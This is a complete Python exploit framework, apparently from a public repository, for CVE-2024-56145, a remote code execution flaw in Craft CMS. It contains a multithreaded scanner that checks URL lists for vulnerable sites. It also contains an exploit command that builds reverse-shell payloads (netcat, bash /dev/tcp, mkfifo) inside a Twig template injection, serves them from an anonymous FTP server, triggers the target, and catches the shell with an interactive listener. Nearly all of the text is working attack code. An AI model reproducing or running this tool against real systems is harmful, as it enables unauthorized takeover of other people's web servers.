README.md
Rendering markdown...
import os
import sys
import uuid
import select
import socket
import warnings
import requests
import threading
import rich_click as click
from rich.console import Console
from alive_progress import alive_bar
from pyftpdlib.servers import FTPServer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.authorizers import DummyAuthorizer
from concurrent.futures import ThreadPoolExecutor
console = Console()
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings(
"ignore", category=RuntimeWarning, module="pyftpdlib.authorizers"
)
@click.group(context_settings=dict(help_option_names=["-h", "--help"]))
def cli():
"""
CVE-2024-56145 Exploit Framework
Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS.
Thanks to Assetnote for their research and findings:
https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
This tool provides commands to:
- Check if a target is vulnerable.
- Exploit the vulnerability using a crafted FTP server and listener.
"""
pass
@cli.command()
@click.option("-u", "--url", required=False, help="The target URL for checking")
@click.option(
"-f",
"--file",
required=False,
type=click.Path(exists=True),
help="File containing a list of URLs",
)
@click.option(
"-t", "--threads", default=50, type=int, help="Number of concurrent threads"
)
@click.option(
"-o",
"--output",
required=False,
type=click.Path(),
help="Output file to save results",
)
def check(url, file, threads, output):
if not (url or file):
console.print(
"[bold red]You must specify either a URL or a file containing URLs.[/bold red]"
)
return
targets = ([url] if url else []) + (
[line.strip() for line in open(file, "r") if line.strip()] if file else []
)
with alive_bar(
len(targets), title="Checking Targets", bar="smooth", enrich_print=False
) as bar:
writer = open(output, "a").write if output else None
lock = threading.Lock()
def process_target(target):
with lock:
bar()
result = check_target(target)
with lock:
writer(f"{result}\n")
with ThreadPoolExecutor(max_workers=threads) as executor:
executor.map(process_target, targets)
if output:
writer.__self__.close()
def check_target(target):
nonce = str(uuid.uuid4())
try:
response = requests.get(
f"{target}?--configPath=/{nonce}", verify=False, timeout=2
)
if "mkdir()" in response.text and nonce in response.text:
console.print(f"[bold green]{target} is vulnerable![/bold green]")
return f"{target} | VULNERABLE"
console.print(f"[bold yellow]{target} is not vulnerable.[/bold yellow]")
return f"{target} | NOT VULNERABLE"
except Exception as e:
console.print(f"[bold red]Failed to check {target}: {e}[/bold red]")
return f"{target} | ERROR"
@cli.command()
@click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host")
@click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port")
@click.option("-u", "--url", required=True, help="The target URL for exploitation")
@click.option(
"-lh", "--lhost", required=True, help="The local host for reverse shell listener"
)
@click.option(
"-lp",
"--lport",
required=True,
type=int,
help="The local port for reverse shell listener",
)
@click.option(
"-px",
"--payload",
default="bash",
type=click.Choice(["nc", "bash", "mkfifo"]),
help="Payload type to use",
)
def exploit(ftp_host, ftp_port, url, lhost, lport, payload):
payload_str = generate_payload(payload, lhost, lport)
root_dir = "./virtual"
create_virtual_files(root_dir, payload_str)
threading.Thread(
target=start_ftp_server, args=(ftp_host, ftp_port, root_dir), daemon=True
).start()
threading.Thread(target=start_listener, args=(lhost, lport), daemon=True).start()
console.print("[bold green]FTP server and listener started[/bold green]")
trigger_http_request(url, ftp_host, ftp_port)
def generate_payload(payload_type, lhost, lport):
payload_templates = {
"nc": f"nc -e /bin/bash {lhost} {lport}",
"bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"',
"mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f",
}
payload = f"{{{{ ['system', '{payload_templates[payload_type]}'] | sort('call_user_func') }}}}"
console.print(f"[bold yellow]Payload generated:[/bold yellow] {payload}")
return payload
def create_virtual_files(root_dir, payload):
try:
os.makedirs(f"{root_dir}/default", exist_ok=True)
with open(f"{root_dir}/default/index.twig", "w") as twig_file:
twig_file.write(payload)
with open(f"{root_dir}/default/index.html", "w") as html_file:
html_file.write(payload)
console.print("[bold green]Virtual files created successfully.[/bold green]")
except Exception as e:
console.print(f"[bold red]Failed to create virtual files:[/bold red] {e}")
def start_ftp_server(host, port, root_dir):
authorizer = DummyAuthorizer()
authorizer.add_anonymous(root_dir, perm="elradfmw")
handler = FTPHandler
handler.authorizer = authorizer
server = FTPServer((host, port), handler)
console.print(f"[bold green]FTP server running on {host}:{port}[bold green]")
try:
server.serve_forever()
except Exception as e:
console.print(f"[bold red]Error starting FTP server:[/bold red] {e}")
def trigger_http_request(url, ftp_host, ftp_port):
templates_path = f"ftp://{ftp_host}:{ftp_port}"
console.print(
f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[bold yellow]"
)
try:
response = requests.get(f"{url}?--templatesPath={templates_path}", verify=False)
if response.status_code == 200:
console.print(
"[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]"
)
else:
console.print(
f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}"
)
except Exception as e:
console.print(f"[bold red]Failed to send HTTP request:[/bold red] {e}")
def start_listener(lhost, lport, timeout=30):
console.print(f"[bold cyan]Starting listener on {lhost}:{lport}[bold cyan]")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((lhost, lport))
s.listen(1)
s.settimeout(timeout)
try:
console.print(
f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]"
)
conn, addr = s.accept()
console.print(
f"[bold green]Connection received from {addr[0]}:{addr[1]}[bold green]"
)
conn.setblocking(0)
while True:
ready, _, _ = select.select([conn, sys.stdin], [], [])
if conn in ready:
data = conn.recv(4096).decode(errors="ignore")
if not data:
break
sys.stdout.write(data)
sys.stdout.flush()
if sys.stdin in ready:
command = sys.stdin.readline().strip()
conn.sendall((command + "\n").encode())
except socket.timeout:
console.print(
f"[bold red]No connection received within {timeout} seconds.[/bold red]"
)
except KeyboardInterrupt:
console.print("[bold cyan]\nListener stopped by user.[/bold cyan]")
except Exception as e:
console.print(f"[bold red]Error: {e}[bold red]")
finally:
conn.close()
s.close()
console.print("[bold cyan]Listener closed.[/bold cyan]")
if __name__ == "__main__":
cli()